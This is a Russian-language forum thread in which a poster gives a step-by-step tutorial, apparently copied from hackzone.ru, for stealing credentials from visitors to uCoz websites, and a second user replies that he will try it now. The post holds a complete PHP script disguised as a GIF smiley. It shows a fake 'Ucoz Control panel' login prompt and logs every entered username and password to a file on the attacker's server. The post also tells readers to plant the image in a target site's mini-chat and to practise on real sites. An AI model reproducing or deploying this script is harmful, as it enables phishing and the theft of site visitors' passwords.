Главная Форум Фильмы Онлайн Фотоальбом Статьи Скачать Радио Профиль Выход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Взлом сайта на UCOZ
hypnoseДата: Воскресенье, 10.05.2009, 22:58:02 | Сообщение # 1
Генерал-майор
Сообщений: 294
Награды: 9
Репутация: 23
Статус: Offline

Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net ) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:

Code
<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

http://mysite.phphost.net/smile.gif

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/ ) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))

Особое спасибо нашему порталу hackzone.ru за то, что он такой хороший ))). А также всем участникам хакзоны которые мне помогали во всем, советовали мне нужные вещи и помогают по сей день.

Источник: hackzone.ru


 
Phoenix234Дата: Воскресенье, 31.05.2009, 14:52:12 | Сообщение # 2
Лейтенант
Сообщений: 51
Награды: 2
Репутация: 2
Статус: Offline
497072705

hypnose, Спасибо большое щас попробую!
 
  • Страница 1 из 1
  • 1
Поиск:

Статистика Форума
Последние темы Читаемые темы Лучшие пользователи Новые пользователи

Расскажите о своём го...

(3)

Предложение-Вопрос но...

(8)

Contry

(0)

находкинские оптовые ...

(0)

Assigoarish

(0)

футболка с оленем -5...

(0)

дизайн майки -56585

(0)

майки для молодоженов...

(0)

мужские модные майки ...

(0)

Игровые автоматы в Ка...

(0)

Ассоциации

(315)

Города

(96)

Игра слов

(55)

раздача ICQ №1

(48)

Набор модераторов фор...

(46)

Слуховая терапия А.То...

(39)

Разделы форума

(34)

3 буквЫ

(30)

Флудилка

(27)

Скриншоты

(23)

Аладин

(459 Постов)

UrBaN575

(355 Постов)

hypnose

(294 Постов)

AliveZloyB

(236 Постов)

BoPoH

(118 Постов)

D1M14

(111 Постов)

Dart_Mysua

(79 Постов)

Hanter@

(55 Постов)

Phoenix234

(51 Постов)

Owl

(31 Постов)

did

(18.06.2025)

DavidZet

(01.08.2023)

joymn

(12.02.2022)

nerb

(01.12.2021)

ivanenokEr

(12.11.2021)

ChapligaCewly

(11.11.2021)

burenoksoita

(24.10.2021)

KarasevEr

(15.07.2021)

TRON

(28.05.2021)

anemy

(09.05.2021)


Карта форума
Rambler's Top100